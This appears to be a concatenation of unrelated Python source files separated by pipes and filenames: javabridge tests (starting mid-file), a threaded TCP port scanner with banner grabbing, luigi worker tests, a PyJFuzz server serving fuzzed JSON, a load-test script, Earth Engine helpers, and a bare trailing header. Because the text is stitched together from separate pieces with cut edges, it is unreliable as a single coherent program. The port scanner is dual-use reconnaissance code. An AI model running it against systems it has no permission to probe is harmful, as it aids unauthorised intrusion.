javabridge.set_field(o, "NoSuchField", "I", 1)
self.assertRaises(javabridge.JavaException, fn)
def test_10_01_iterate_java_on_non_iterator(self):
#
# Regression test of issue #11: the expression below segfaulted
#
def fn():
list(javabridge.iterate_java(javabridge.make_list(range(10)).o))
self.assertRaises(javabridge.JavaError, fn)
def test_10_01_class_path(self):
for arg in ['-cp', '-classpath', '-Djava.class.path=foo']:
self.assertRaises(ValueError, lambda: javabridge.start_vm([arg]))
def test_11_01_make_run_dictionary(self):
from javabridge.jutil import make_run_dictionary
o = javabridge.make_instance("java/util/Hashtable", "()V")
a = javabridge.make_instance("java/util/ArrayList", "()V")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"foo", "bar")
javabridge.call(
o, "put",
"(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;",
"baz", a)
d = make_run_dictionary(o)
self.assertIn("foo", d)
self.assertEqual(d["foo"], "bar")
self.assertIn("baz", d)
self.assertTrue(javabridge.call(d["baz"], "equals",
"(Ljava/lang/Object;)Z", a))
def test_12_01_jref(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
alt = javabridge.redeem_jref(ref_id)
o["bar"] = "bunny"
for key in o:
self.assertTrue(key in alt)
self.assertEqual(o[key], alt[key])
def test_12_02_jref_lost(self):
o = dict(foo="bar", baz="2")
ref_id, ref = javabridge.create_jref(o)
del ref
self.assertRaises(KeyError, javabridge.redeem_jref, ref_id)
def test_12_03_jref_create_and_lock(self):
cpython = javabridge.JClassWrapper(
'org.cellprofiler.javabridge.CPython')()
d = javabridge.JClassWrapper('java.util.Hashtable')()
result = javabridge.JClassWrapper('java.util.ArrayList')()
d.put("result", result)
ref_self = javabridge.create_and_lock_jref(self)
d.put("self", ref_self)
cpython.execute(
'import javabridge\n'
'x = { "foo":"bar"}\n'
'ref_id = javabridge.create_and_lock_jref(x)\n'
'javabridge.JWrapper(result).add(ref_id)', d, d)
cpython.execute(
'import javabridge\n'
'ref_id = javabridge.JWrapper(result).get(0)\n'
'self = javabridge.redeem_jref(javabridge.to_string(self))\n'
'self.assertEqual(javabridge.redeem_jref(ref_id)["foo"], "bar")\n'
'javabridge.unlock_jref(ref_id)', d, d)
javabridge.unlock_jref(ref_self)
self.assertRaises(KeyError, javabridge.redeem_jref, ref_self)
def test_13_01_unicode_arg(self):
# On 2.x, check that a unicode argument is properly prepared
s = u"Hola ni\u00F1os"
s1, s2 = s.split(" ")
if sys.version_info.major == 2: s2 = s2.encode("utf-8")
env = javabridge.get_env()
js1 = env.new_string(s1+" ")
result = javabridge.call(
js1, "concat", "(Ljava/lang/String;)Ljava/lang/String;", s2)
self.assertEqual(s, result)
if __name__=="__main__":
unittest.main()
|
light_port_scanner.py
|
#!/usr/bin/env python3
# author: greyshell
# description: TBD
import socket
import optparse
from socket import *
from threading import *
from time import sleep
screenLock = Semaphore(value=1)
def connect_scan(tgtHost, tgtPort):
try:
sock = socket(AF_INET, SOCK_STREAM)
buffer = "greyshell\r\n"
connect = sock.connect((tgtHost, tgtPort))
sock.send(buffer.encode())
results = sock.recv(1000)
screenLock.acquire()
print('[+] %d/tcp open' % tgtPort)
print('[-] ' + str(results))
except Exception as e:
screenLock.acquire()
finally:
screenLock.release()
sock.close()
def portScan(tgtHost, tgtPorts):
try:
tgtIP = gethostbyname(tgtHost)
except:
print("[-] Cannot resolve '%s': Unknown host" % tgtHost)
return
try:
tgtName = gethostbyaddr(tgtIP)
print('\n[+] Scan Results for: ' + tgtName[0] + '\n')
except:
print('\n[+] Scan Results for: ' + tgtIP)
setdefaulttimeout(5)
for tgtPort in tgtPorts:
t = Thread(target=connect_scan, args=(tgtHost, int(tgtPort)))
t.start()
sleep(0.1)
def main():
# Adding parser functionality
parser = optparse.OptionParser('Usage %prog -H' + ' <target host> -p <target port>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-p', dest='tgtPort', type='string', help='specify target ports separated by comma')
(options, args) = parser.parse_args()
tgtHost = options.tgtHost
tgtPorts = str(options.tgtPort).split(',')
if tgtHost is None:
print('\n[-] You must specify a target host and port[s], separated by comma')
print(parser.usage)
exit(0)
if tgtPorts[0] == 'None':
print('\n[-] Scanning top 1000 TCP ports preferred by nmap')
temp = "1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,49,53,70,79,80," \
"81,82,83,84,85,88,89,90,99,100,106,109,110,111,113,119,125,135,139,143,144,146," \
"161,163,179,199,211,212,222,254,254,256,259,264,280,301,306,311,340,366,389,406,407," \
"416,417,425,427,443,444,445,458,464,465,481,497,500,512,513,514,515,524,541,543,544," \
"545,548,554,555,563,587,593,616,617,625,631,636,646,648,666,667,668,683,687,691,700," \
"705,711,714,720,722,726,749,765,777,783,787,800,801,808,843,873,880,888,898,900,901," \
"902,903,911,912,981,987,990,992,993,995,999,1000,1001,1002,1007,1009,1010,1011,1021,1022," \
"1023,1024,1025,1026,1027,1028,1029,1030,1031,1032,1033,1034,1035,1036,1037,1038," \
"1039,1040,1041,1042,1043,1044,1045,1046,1047,1048,1049,1050,1051,1052,1053,1054," \
"1055,1056,1057,1058,1059,1060,1061,1062,1063,1064,1065,1066,1067,1068,1069,1070," \
"1071,1072,1073,1074,1075,1076,1077,1078,1079,1080,1081,1082,1083,1084,1085,1086,1087," \
"1088,1089,1090,1091,1092,1093,1094,1095,1096,1097,1098,1099,1100,1102,1104,1105,1106,1107," \
"1108,1110,1111,1112,1113,1114,1117,1119,1121,1122,1123,1124,1126,1130,1131,1132,1137,1138,1141," \
"1145,1147,1148,1149,1151,1152,1154,1163,1164,1165,1166,1169,1174,1175,1183,1185,1186,1187," \
"1192,1198,1199,1201,1213,1216,1217,1218,1233,1234,1236,1244,1247,1248,1259,1271,1272,1277,1287," \
"1296,1300,1301,1309,1310,1311,1322,1328,1334,1352,1417,1433,1434,1443,1455,1461,1494," \
"1500,1501,1503,1521,1524,1533,1556,1580,1583,1594,1600,1641,1658,1666,1687,1688,1700," \
"1717,1721,1723,1755,1761,1782,1783,1801,1805,1812,1839,1840,1862,1863,1864,1875,1900,1914," \
"1935,1947,1971,1972,1974,1984,1998,1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009," \
"2010,2013,2020,2021,2022,2030,2033,2034,2035,2038,2040,2041,2042,2043,2045,2045,2046,2047," \
"2048,2049,2065,2068,2099,2100,2103,2105,2106,2107,2111,2119,2121,2126,2135,2144,2160,2161,2170," \
"2179,2190,2191,2196,2200,2222,2251,2260,2288,2301,2323,2366,2381,2382,2383,2393,2394,2399," \
"2401,2492,2500,2522,2525,2557,2601,2602,2604,2605,2607,2608,2638,2701,2702,2710,2717,2718,2725," \
"2800,2809,2811,2869,2875,2909,2910,2920,2967,2968,2998,3000,3001,3003,3005,3006,3007,3011,3013," \
"3017,3030,3031,3052,3071,3077,3128,3168,3211,3221,3260,3261,3268,3269,3283,3300,3301,3306," \
"3322,3323,3324,3325,3333,3351,3367,3369,33670,3371,3372,3389,3390,3404,3476,3493,3517,3527," \
"3546,3551,3580,3659,3689,3690,3703,3737,3766,3784,3800,3801,3809,3814,3826,3827,3828,3851," \
"3869,3871,3878,3880,3889,3905,3914,3918,3920,3945,3971,3986,3995,3998,4000,4001,4002,4003," \
"4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4446,4449,4550,4567," \
"4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061," \
"5080,5087,5100,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405," \
"5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800," \
"5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911," \
"5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002," \
"6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502," \
"6510,6543,6547,6565,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792," \
"6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402," \
"7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000," \
"8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085," \
"8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291," \
"8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899," \
"8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102," \
"9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595," \
"9618,9666,9876,9877,9878,9898,9900,9917,9929," \
"9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082," \
"10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174," \
"12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15001,15002,15003," \
"15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101," \
"18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939," \
"23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951," \
"31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776," \
"32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292," \
"40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157," \
"49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002," \
"50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328," \
"55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623," \
"64680,65000,65129,65389"
tgtPorts = str(temp).split(',')
else:
pass
portScan(tgtHost, tgtPorts)
print('[+] Finished TCP scan.')
if __name__ == '__main__':
main()
|
worker_test.py
|
# Copyright (c) 2012 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import time
from luigi.scheduler import CentralPlannerScheduler
import luigi.worker
from luigi.worker import Worker
from luigi import Task, ExternalTask, RemoteScheduler
import unittest
import logging
import threading
import luigi.notifications
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self.task_id)
self.has_run = True
class WorkerTest(unittest.TestCase):
def setUp(self):
# InstanceCache.disable()
self.sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.w = Worker(scheduler=self.sch, worker_id='X')
self.w2 = Worker(scheduler=self.sch, worker_id='Y')
self.time = time.time
def tearDown(self):
if time.time != self.time:
time.time = self.time
self.w.stop()
self.w2.stop()
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_fail(self):
class A(Task):
def run(self):
self.has_run = True
raise Exception()
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see central_planner_test.CentralPlannerTest.test_remove_dep
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.w.add(b_a)
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.w2.add(b_c)
self.w.run() # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEquals(eb.task_id, "B()")
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X')
w2 = Worker(scheduler=sch, worker_id='Y')
w.add(b)
w2.add(eb)
logging.debug("RUNNING BROKEN WORKER")
w2.run()
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEquals(eb.task_id, "B()")
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X')
w2 = Worker(scheduler=sch, worker_id='Y')
w2.add(eb)
w.add(b)
w2.run()
self.assertFalse(b.complete())
w.run()
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X', keep_alive=True)
w2 = Worker(scheduler=sch, worker_id='Y', keep_alive=True, wait_interval=0.1)
w.add(a)
w2.add(b)
threading.Thread(target=w.run).start()
w2.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id="foo")
w.add(b)
w.run()
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
w.stop()
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = CentralPlannerScheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
w = Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
)
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
w.stop()
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
w = Worker(ping_interval=0.01)
self.assertTrue(w._keep_alive_thread.is_alive())
w.stop() # should stop within 0.01 s
self.assertFalse(w._keep_alive_thread.is_alive())
class EmailTest(unittest.TestCase):
def setUp(self):
super(EmailTest, self).setUp()
self.send_email = luigi.notifications.send_email
self.last_email = None
def mock_send_email(subject, message, sender, recipients, image_png=None):
self.last_email = (subject, message, sender, recipients, image_png)
luigi.notifications.send_email = mock_send_email
def tearDown(self):
luigi.notifications.send_email = self.send_email
class WorkerEmailTest(EmailTest):
def setUp(self):
super(WorkerEmailTest, self).setUp()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.worker = Worker(scheduler=sch, worker_id="foo")
def tearDown(self):
self.worker.stop()
def test_connection_error(self):
sch = RemoteScheduler(host="this_host_doesnt_exist", port=1337)
worker = Worker(scheduler=sch)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEquals(self.last_email, None)
worker.add(a)
self.assertEquals(self.waits, 2)  # three scheduling attempts -> two waits in between
self.assertNotEquals(self.last_email, None)
self.assertEquals(self.last_email[0], "Luigi: Framework error while scheduling %s" % (a,))
worker.stop()
def test_complete_error(self):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.worker.run()
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.assertFalse(a.has_run)
def test_complete_return_value(self):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.worker.run()
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.assertFalse(a.has_run)
def test_run_error(self):
class A(luigi.Task):
def complete(self):
return False
def run(self):
raise Exception("b0rk")
a = A()
self.worker.add(a)
self.assertEquals(self.last_email, None)
self.worker.run()
self.assertEquals(("Luigi: %s FAILED" % (a,)), self.last_email[0])
def test_no_error(self):
class A(DummyTask):
pass
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(self.last_email, None)
self.worker.run()
self.assertEquals(self.last_email, None)
self.assertTrue(a.complete())
if __name__ == '__main__':
unittest.main()
|
pjf_server.py
|
"""
The MIT License (MIT)
Copyright (c) 2016 Daniele Linguaglossa <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NON INFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from wsgiref.simple_server import make_server, WSGIRequestHandler
from bottle import route, run, ServerAdapter, response, request, static_file
from .pjf_testcase_server import PJFTestcaseServer
from .errors import PJFBaseException
from .errors import PJFMissingArgument
from threading import Thread
from .pjf_logger import PJFLogger
from .pjf_factory import PJFFactory
from .certs import CERT_PATH
import multiprocessing
import signal
import time
import ssl
import sys
import os
import socket
class WSGIRefServer(ServerAdapter):
"""
WSGI based server class using SSL
"""
def run(self, handler):
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
def log_error(self, format, *args):
pass
self.options['handler_class'] = QuietHandler
srv = make_server(self.host, self.port, handler, **self.options)
srv.serve_forever()
class SSLWSGIRefServer(ServerAdapter):
"""
WSGI based server class using SSL
"""
def run(self, handler):
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
def log_error(self, format, *args):
pass
self.options['handler_class'] = QuietHandler
srv = make_server(self.host, self.port, handler, **self.options)
srv.socket = ssl.wrap_socket(srv.socket, certfile=CERT_PATH, server_side=True)
srv.serve_forever()
class PJFServer:
"""
Class used to run both HTTP and HTTPS server using bottle web server
"""
def __init__(self, configuration):
self.client_queue = multiprocessing.Queue(0)
self.apply_patch()
self.logger = self.init_logger()
if ["debug", "html", "content_type", "notify", "ports"] not in configuration:
raise PJFMissingArgument()
if configuration.debug:
print("[\033[92mINFO\033[0m] Starting HTTP ({0}) and HTTPS ({1}) built-in server...".format(
configuration.ports["servers"]["HTTP_PORT"],
configuration.ports["servers"]["HTTPS_PORT"]
))
if not configuration.content_type:
configuration.content_type = "application/json"
self.config = configuration
self.json = PJFFactory(configuration)
self.https = SSLWSGIRefServer(host="0.0.0.0", port=self.config.ports["servers"]["HTTPS_PORT"])
self.http = WSGIRefServer(host="0.0.0.0", port=self.config.ports["servers"]["HTTP_PORT"])
self.httpsd = multiprocessing.Process(target=run, kwargs={"server": self.https, "quiet": True})
self.httpd = multiprocessing.Process(target=run, kwargs={"server": self.http, "quiet": True})
if self.config.fuzz_web:
self.request_checker = Thread(target=self.request_pool, args=())
self.logger.debug("[{0}] - PJFServer successfully initialized".format(time.strftime("%H:%M:%S")))
def run(self):
"""
Start the servers
"""
route("/")(self.serve)
if self.config.html:
route("/<filepath:path>")(self.custom_html)
if self.config.fuzz_web:
self.request_checker.start()
self.httpd.start()
self.httpsd.start()
def save_testcase(self, ip, testcases):
try:
count = 0
dir_name = "testcase_{0}".format(ip)
print("[\033[92mINFO\033[0m] Client {0} seems to not respond anymore, saving testcases".format(ip))
try:
os.mkdir(dir_name)
except OSError:
pass
for test in testcases:
with open("{0}/testcase_{1}.json".format(dir_name, count), "wb") as t:
t.write(test)
t.close()
count += 1
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def request_pool(self):
try:
clients = {}
end = False
while not end:
try:
client = self.client_queue.get(timeout=5)
if client == (0,0):
end = True
else:
if client[0] not in clients:
clients.update({client[0]: {"timestamp": time.time(), "testcases": []}})
else:
clients[client[0]]["timestamp"] = time.time()
if len(clients[client[0]]["testcases"]) <= 10:
clients[client[0]]["testcases"].append(client[1])
else:
clients[client[0]]["testcases"].pop(0)
clients[client[0]]["testcases"].append(client[1])
except:
pass
for c in list(clients.keys()):
if time.time() - clients[c]["timestamp"] >= 30:
self.save_testcase(c, clients[c]["testcases"])
del clients[c]
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def stop(self):
"""
Kill the servers
"""
os.kill(self.httpd.pid, signal.SIGKILL)
os.kill(self.httpsd.pid, signal.SIGKILL)
self.client_queue.put((0,0))
if self.config.fuzz_web:
self.request_checker.join()
self.logger.debug("[{0}] - PJFServer successfully completed".format(time.strftime("%H:%M:%S")))
def custom_html(self, filepath):
"""
Serve custom HTML page
"""
try:
response.headers.append("Access-Control-Allow-Origin", "*")
response.headers.append("Accept-Encoding", "identity")
response.headers.append("Content-Type", "text/html")
return static_file(filepath, root=self.config.html)
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def serve(self):
"""
Serve fuzzed JSON object
"""
try:
fuzzed = self.json.fuzzed
if self.config.fuzz_web:
self.client_queue.put((request.environ.get('REMOTE_ADDR'), fuzzed))
response.headers.append("Access-Control-Allow-Origin", "*")
response.headers.append("Accept-Encoding", "identity")
response.headers.append("Content-Type", self.config.content_type)
if self.config.notify:
PJFTestcaseServer.send_testcase(fuzzed, '127.0.0.1', self.config.ports["servers"]["TCASE_PORT"])
yield fuzzed
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def init_logger(self):
"""
Init the default logger
"""
return PJFLogger.init_logger()
def apply_patch(self):
"""
Fix default socket lib to handle client disconnection while receiving data (Broken pipe)
"""
if sys.version_info >= (3, 0):
# No patch for python >= 3.0
pass
else:
from .patch.socket import socket as patch
socket.socket = patch
|
perf_test_mock_service_v4_test_timer.py
|
import requests
import threading
import queue
import sys
import time
# Global variables
queue_results = queue.Queue()
start_time = 0
# event flag to set and check test time is up.
event_time_up = threading.Event()
def test_mock_service():
url = 'http://127.0.0.1:5000/json'
resp = requests.get(url)
# Convert assert for functional tests to validate for performance tests so it won't stop on a test failure.
# assert resp.status_code == 200
# assert resp.json()["code"] == 1
if resp.status_code != 200:
print('Test failed with response status code %s.' % resp.status_code )
return 'fail', resp.elapsed.total_seconds()
elif resp.json()["code"] != 1:
print('Test failed with code %s != 1.' % resp.json()["code"] )
return 'fail', resp.elapsed.total_seconds()
else:
# print('Test passed.')
return 'pass', resp.elapsed.total_seconds()
def set_event_time_up():
if not event_time_up.is_set():
event_time_up.set()
def loop_test(loop_wait=0, loop_times=sys.maxsize):
looped_times = 0
while (looped_times < loop_times
and not event_time_up.is_set()):
# run an API test
test_result, elapsed_time = test_mock_service()
# put results into a queue for statistics
queue_results.put(['test_mock_service', test_result, elapsed_time])
# You can add more API tests in a loop here.
looped_times += 1
time.sleep(loop_wait)
def stats():
# request per second
rps_mean = 0
total_tested_requests = 0
total_pass_requests = 0
# time per request
tpr_min = 999
tpr_mean = 0
tpr_max = 0
sum_response_time = 0
# failures
total_fail_requests = 0
total_exception_requests = 0
global start_time
end_time = time.time()
# get the approximate queue size
qsize = queue_results.qsize()
loop = 0
for i in range(qsize):
try:
result = queue_results.get_nowait()
loop += 1
except queue.Empty:
break
# calc stats
if result[1] == 'exception':
total_exception_requests += 1
elif result[1] == 'fail':
total_fail_requests += 1
elif result[1] == 'pass':
total_pass_requests += 1
sum_response_time += result[2]
# update min and max time per request
if result[2] < tpr_min:
tpr_min = result[2]
if result[2] > tpr_max:
tpr_max = result[2]
total_tested_requests += loop
# time per requests - mean (avg)
if total_pass_requests != 0:
tpr_mean = sum_response_time / total_pass_requests
# requests per second - mean
if start_time == 0:
print('stats: start_time is not set, skipping rps stats.')
else:
tested_time = end_time - start_time
rps_mean = total_pass_requests / tested_time
# print stats
print('\n-----------------Test Statistics---------------')
print(time.asctime())
print('Total requests: %s, pass: %s, fail: %s, exception: %s'
% (total_tested_requests, total_pass_requests, total_fail_requests, total_exception_requests)
)
if total_pass_requests > 0:
print('For pass requests:')
print('Request per Second - mean: %.2f' % rps_mean)
print('Time per Request - mean: %.6f, min: %.6f, max: %.6f'
% (tpr_mean, tpr_min, tpr_max) )
if __name__ == '__main__':
### Test Settings ###
concurrent_users = 2
loop_times = 100
test_time = 5 # time in seconds, e.g. 36000
workers = []
start_time = time.time()
print('Tests started at %s.' % start_time )
# start concurrent user threads
for i in range(concurrent_users):
thread = threading.Thread(target=loop_test, kwargs={'loop_times': loop_times}, daemon=True)
thread.start()
workers.append(thread)
# set a timer to stop testing
timer = threading.Timer(test_time, set_event_time_up)
timer.start()
# Block until all threads finish.
for w in workers:
w.join()
# stop timer if loop_times is reached first.
if not event_time_up.is_set():
timer.cancel()
end_time = time.time()
# Performance stats
stats()
print('\nTests ended at %s.' % end_time )
print('Total test time: %s seconds.' % (end_time - start_time) )
|
__init__.py
|
# coding=utf-8
""" User Interface Tools """
import ee
import threading
import pprint
from . import dispatcher, map
ASYNC = False
def eprint(*args, **kwargs):
""" Print EE Objects. Similar to `print(object.getInfo())` but with
some magic (lol)
:param eeobject: object to print
:type eeobject: ee.ComputedObject
:param indent: indentation of the print output
:type indent: int
:param do_async: call getInfo() asynchronously
:type do_async: bool
"""
indent = kwargs.get('indent', 2)
do_async = kwargs.get('do_async', ASYNC)
pp = pprint.PrettyPrinter(indent=indent)
info_return = [None]*len(args)
def get_info(eeobject, index):
""" Get Info """
info_return[index] = dispatcher.dispatch(eeobject)
for i, eeobject in enumerate(args):
# DO THE SAME FOR EVERY OBJECT
if do_async:
thread = threading.Thread(target=get_info,
args=(eeobject, i))
thread.start()
else:
get_info(eeobject, i)
for result in info_return:
pp.pprint(result)
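# A minimal usage sketch (illustrative only, not from the original; assumes
# ee.Initialize() has been called so the ComputedObjects can be evaluated):
#   eprint(ee.Number(1), ee.String("hello"), indent=4, do_async=False)
# Each argument is dispatched and pretty-printed in turn.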
def getInfo(eeobject):
""" Get eeobject information (getInfo) asynchronously. For not async just
use `ee.data.getInfo` """
class newDict(dict):
def get(self):
return self['info']
def __call__(self):
return self.get()
result = newDict({'info':None})
def get_info(eeobject, from_ee):
if from_ee:
info = eeobject.getInfo()
else:
info = eeobject
result['info'] = info
module = getattr(eeobject, '__module__', None)
parent = module.split('.')[0] if module else None
if parent == ee.__name__:
thread = threading.Thread(target=get_info, args=(eeobject, True))
thread.start()
else:
get_info(eeobject, False)
return result
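# Illustrative usage sketch (an assumption for clarity; needs an initialized
# Earth Engine session):
#   info = getInfo(ee.Number(2))
#   ... do other work while the background thread fetches the value ...
#   print(info())   # or info.get(); None until the thread has populated it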
|
PrimitiveTest.py
|
##########################################################################
#
